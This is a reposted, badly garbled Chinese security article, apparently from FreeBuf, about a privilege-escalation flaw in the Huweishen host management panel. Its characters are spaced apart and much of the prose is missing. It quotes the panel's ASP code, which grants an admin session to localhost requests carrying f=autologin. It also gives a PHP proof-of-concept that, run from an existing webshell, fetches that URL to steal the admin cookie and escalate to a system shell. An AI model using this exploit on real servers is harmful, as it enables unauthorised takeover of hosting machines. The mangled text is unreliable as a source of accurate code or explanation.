[12834] 2018-06-16_护卫神主机大师提权漏洞利用分析

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-18
2018-06-16_护卫神主机大师提权漏洞利用分析 F r e e d o m   F r e e B u f   2 0 1 8 - 0 6 - 1 6 0 x 0 1   · I I S + A S P + A S P . n e t + P H P 5 . 2 - 5 . 6 + M y S Q L + F T P + + P h p M y A d m i n 线 线 S Q L   S e r v e r M y S Q L W e b W i n d o w s   S e r v e r   2 0 0 8 / 2 0 1 2 1 4 0 x 0 2   , , W T F ?
6 5 8 8 a s p x : H w s H o s t M a s t e r h o s t w e b s y s t e m / a d m i n / i n d e x . a s p i p 访 s t r I p R e q u e s t . S e r v e r V a r i a b l e s ( l o c a l _ a d d r )   访 s t r A u t o = a u t o l o g i n w e b s h e l l 访 0 x 0 3   w e b s h e l l c o o k i e < % O p t i o n   E x p l i c i t % > < ! - - # i n c l u d e   f i l e = " . . / c o n n . a s p " - - > < % D i m   s t r I p s t r I p   =   R e q u e s t . S e r v e r V a r i a b l e s ( " l o c a l _ a d d r " ) D i m   s t r A u t o s t r A u t o   =   L C a s e ( T r i m ( R e q u e s t . Q u e r y S t r i n g ( " f " ) ) ) I f   ( s t r I p   =   " : : 1 "   O r   s t r I p   =   " 1 2 7 . 0 . 0 . 1 " )   A n d   s t r A u t o   =   " a u t o l o g i n "     T h e n         '         D i m   s q l , r s         c a l l   c o n n _ o p e n ( )         S e t   r s   =   S e r v e r . C r e a t e O b j e c t ( " A d o d b . R e c o r d s e t " )         s q l   =   " s e l e c t   t o p   1   *   f r o m   [ h u w e i s h e n _ A d m i n ] "         r s . O p e n   s q l , c o n n , 1 , 1         i f   r s . R e c o r d C o u n t   =   0   t h e n                 S e s s i o n ( " a d m i n " ) =   " a u t o l o g i n "         e l s e                 S e s s i o n ( " a d m i n " )   =   r s ( " u s e r n a m e " )         e n d   i f         r s . C l o s e         S e s s i o n . T i m e o u t   = 6 0 0         A d d L o g   S e s s i o n ( " a d m i n " ) ,   1 ,   " "         R e s p o n s e . R e d i r e c t   " i n d e x . a s p " E n d   I f % >
访 c o o k i e c o o k i e 0 x 0 4   G E T S H E L L 访 c o o k i e c o o k i e 访 / a d m i n / i n d e x . a s p < ? p h p f u n c t i o n   h t t p G e t ( )   {         $ u r l   =   ' [ h t t p : / / 1 2 7 . 0 . 0 . 1 : 6 5 8 8 / a d m i n / i n d e x . a s p ? f = a u t o l o g i n ] ( h t t p : / / 1 2 7 . 0 . 0 . 1 : 6 5 8 8 / a d m i n / i n d e x . a s p ? f = a u t o l o g i n ) ' ;         $ c h   =   c u r l _ i n i t ( ) ;         c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ U R L ,   $ u r l ) ;         c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ H E A D E R ,   T R U E ) ;         / / r e s p o n s e   h e a d e r         c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ N O B O D Y ,   T R U E ) ;   / / r e s p o n s e   b o d y         c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ R E T U R N T R A N S F E R ,   T R U E ) ;         c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ F O L L O W L O C A T I O N ,   F A L S E ) ;         c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ A U T O R E F E R E R ,   T R U E ) ;         c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ T I M E O U T ,   1 2 0 ) ;         $ r e s u l t   =   c u r l _ e x e c ( $ c h ) ;         r e t u r n   $ r e s u l t ; } e c h o   h t t p G e t ( ) ; ? >
便 F T P s h e l l X : H w s H o s t M a s t e r h o s t w e b   X D w e b
, s h e l l s y s t e m 0 x 0 5   s h e l l * F r e e d o m F r e e B u f

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则